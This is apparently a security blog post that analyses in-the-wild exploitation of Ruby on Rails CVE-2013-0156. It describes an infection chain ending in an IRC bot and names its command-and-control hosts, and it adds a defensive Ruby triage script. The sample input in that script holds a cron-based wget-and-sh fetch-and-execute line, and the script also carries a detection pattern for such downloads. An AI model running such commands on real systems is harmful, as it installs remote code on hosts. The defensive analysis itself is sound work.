RoR CVE-2013-0156 in the Wild

Ruby on Rails CVE-2013-0156 has recently been exploited in the wild. This vulnerability was the subject of much discussion, and an emergency RoR advisory, back in January. It’s pretty surprising that it’s taken this long to surface in the wild, but less surprising that people are still running vulnerable installations of Rails. It also appears to be affecting some web hosts.

This adds a command to crontab which downloads and executes files called cmd1, cmd2, and cmd3. At the time of this writing, these are no longer available. These domains have been previously associated with suspicious activity.

Next, it downloads a C source file called k.c to /tmp, compiles it using the system’s gcc, and executes it.

Finally, it downloads and executes a pre-compiled version of k, presumably in case compilation fails.

The source of k.c is available.

This file executes with a name of ‘– bash’, which will appear in the process list. It sets up an IRC bot, which connects to either cvv4you.ru (currently 188.190.124.81) or the bare IP 188.190.124.120 and joins the channel #rails. While the code supports it, no channel key is used. The script uses a randomly generated 9 character nickname when connecting to IRC.

A lockfile ‘/tmp/tan.pid’ ensures the bot only executes once on an infected host.

Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers. There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.
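For anyone triaging a Rails host, here is an added Ruby script (not part of the original post or the bot’s code) that checks the Rails version and scans crontab, `ps` and `netstat` output for the indicators described above. The fixed version numbers are my assumption from the January advisory, the post does not list them, and the sample inputs are constructed.

```ruby
require 'rubygems'

# Assumed fixed versions from the January 2013 advisory (not listed in the post).
# Branches without an entry are treated as vulnerable when older than 3.2.11.
FIXED = { '3.2' => '3.2.11', '3.1' => '3.1.10', '3.0' => '3.0.19', '2.3' => '2.3.15' }.freeze

def rails_vulnerable?(version)
  v = Gem::Version.new(version)
  fixed = FIXED[v.segments[0, 2].join('.')] || '3.2.11'
  v < Gem::Version.new(fixed)
end

# Indicators quoted from the write-up above.
C2_HOSTS = %w[cvv4you.ru 188.190.124.81 188.190.124.120].freeze
LOCKFILE = '/tmp/tan.pid'.freeze
# Cron entries that fetch cmd1/cmd2/cmd3 or k.c, or compile something under /tmp.
CRON_FETCH = %r{\b(?:wget|curl)\b.*\b(?:cmd[123]|k\.c)\b|\bgcc\b.*/tmp/}i

def suspicious_cron_lines(crontab_text)
  crontab_text.lines.map(&:strip)
              .reject { |l| l.empty? || l.start_with?('#') }
              .select { |l| l.match?(CRON_FETCH) }
end

# Input is `ps -eo pid,args` output. The bot forges argv[0] as '– bash' (dash,
# space, bash); a genuine login shell shows '-bash' with no space, so it is not flagged.
def bot_processes(ps_text)
  ps_text.lines.map do |l|
    pid, args = l.strip.split(/\s+/, 2)
    pid if args && args.match?(/\A[-–]+ bash\z/)
  end.compact
end

# Input is `netstat -tn` style output; flag any connection to the IRC C2 hosts.
def c2_connections(netstat_text)
  netstat_text.lines.map(&:strip).select { |l| C2_HOSTS.any? { |h| l.include?(h) } }
end

def triage(rails_version:, crontab:, ps:, netstat:, lockfile_present: File.exist?(LOCKFILE))
  { vulnerable_rails: rails_vulnerable?(rails_version),
    cron: suspicious_cron_lines(crontab),
    bot_pids: bot_processes(ps),
    c2: c2_connections(netstat),
    lockfile: lockfile_present }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample input; EXAMPLE-C2 is a placeholder, not a real host.
  crontab = "# m h dom mon dow cmd\n*/15 * * * * wget -q http://EXAMPLE-C2/cmd1 -O /tmp/cmd1 && sh /tmp/cmd1\n"
  ps      = "  PID ARGS\n 1234 -bash\n 4321 – bash\n"
  netstat = "tcp 0 0 10.0.0.5:41234 188.190.124.81:6667 ESTABLISHED\n"
  p triage(rails_version: '3.2.10', crontab: crontab, ps: ps, netstat: netstat, lockfile_present: false)
end
```

Any non-empty `cron`, `bot_pids` or `c2` result, or a present lockfile, is worth a closer look at the host; the version check alone only tells you the application was exposed.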

In short, this is a pretty straightforward skiddy exploit of a vulnerability that has been publicly known, and warned about, for months.